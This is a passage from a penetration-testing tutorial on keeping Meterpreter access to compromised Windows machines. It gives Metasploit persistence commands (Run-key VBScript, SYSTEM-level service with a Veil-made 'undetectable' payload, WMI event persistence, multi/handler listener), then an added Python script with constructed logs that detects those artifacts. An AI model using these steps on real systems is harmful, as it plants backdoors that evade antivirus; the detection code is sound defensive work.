Maintaining access to a target machine after the initial exploitation is a vital phase known as persistence. Without it, you would lose your connection if the victim reboots their computer or if the network connection is interrupted. Metasploit provides several automated modules to ensure your Meterpreter session remains active across system restarts.
The most common method for Windows targets is the persistence module. From an active Meterpreter session, you can use the command run persistence -U -i 5 -p 4444 -r [Your IP]. The -U flag ensures the backdoor starts when a user logs in, the -i 5 flag tells the payload to attempt a reconnection every five seconds, and the -r flag specifies your listener IP. This module creates an entry under the registry “Run” key and uploads a VBScript payload to the target’s temporary directory.
Another effective method is the persistence_exe module. Unlike the script-based approach, this module allows you to upload a custom executable and set it to run as a system service. To use this, background your current session and type use post/windows/manage/persistence_exe. Set the SESSION variable to your active session ID and the REXEPATH to the location of your Veil-generated undetectable payload. By setting STARTUP to SERVICE, the payload will execute even before a user logs in, providing a SYSTEM-level connection.
For modern Windows environments, WMI (Windows Management Instrumentation) persistence is often preferred because it does not rely on the traditional registry keys or files that antivirus software frequently monitors. Using the post/windows/manage/wmi_persistence module, you can trigger your payload based on a specific event, such as system uptime reaching a certain threshold. Regardless of the method used, always ensure you have a Metasploit multi/handler running on your attack machine to receive the persistent connection whenever it triggers.
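Each of the three methods above leaves a distinct host artifact: a Run-key entry pointing at a script in a temporary directory, a newly installed service, and a WMI event subscription. The following is an added example, not part of the original page, showing how a defender could triage those artifacts from Sysmon (event 13 and 19-21) and System-log (event 7045) records. The sample records are constructed, and the flattened dict layout and function names are assumptions.

```python
import re

# Constructed, flattened event records (not real logs). Field names follow
# Sysmon event 13 and System-log event 7045; the dict shape is an assumption.
SAMPLE_EVENTS = [
    {"source": "sysmon", "id": 13,
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\updater",
     "Details": r"C:\Users\alice\AppData\Local\Temp\example.vbs"},
    {"source": "sysmon", "id": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r"C:\Program Files\Vendor\tray.exe"},
    {"source": "system", "id": 7045, "ServiceName": "examplesvc",
     "ImagePath": r"C:\Users\alice\AppData\Local\Temp\example.exe"},
    {"source": "system", "id": 7045, "ServiceName": "vendoragent",
     "ImagePath": r"C:\Program Files\Vendor\agent.exe"},
    {"source": "sysmon", "id": 20},  # WmiEventConsumer activity
]

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Users\\Public)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)

RUN_FINDING = "Run-key autostart pointing at a script or user-writable path"
SVC_FINDING = "new service whose binary sits in a user-writable path"
WMI_FINDING = "WMI event filter/consumer/binding registered"

def triage(event):
    """Return a finding string for one event record, or None if it looks routine."""
    src, eid = event.get("source"), event.get("id")
    if src == "sysmon" and eid == 13 and RUN_KEY.search(event.get("TargetObject", "")):
        data = event.get("Details", "")
        if USER_WRITABLE.search(data) or SCRIPT_EXT.search(data):
            return RUN_FINDING
    if src == "system" and eid == 7045:
        if USER_WRITABLE.search(event.get("ImagePath", "")):
            return SVC_FINDING
    if src == "sysmon" and eid in (19, 20, 21):
        # Subscriptions are rare on most hosts, so every one is worth a look.
        return WMI_FINDING
    return None

def findings(events):
    """Return (index, finding) pairs for the records that need review."""
    out = []
    for i, event in enumerate(events):
        hit = triage(event)
        if hit:
            out.append((i, hit))
    return out
```

The path patterns are a starting heuristic; legitimate software that autostarts from AppData will also match and needs an allowlist in practice.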


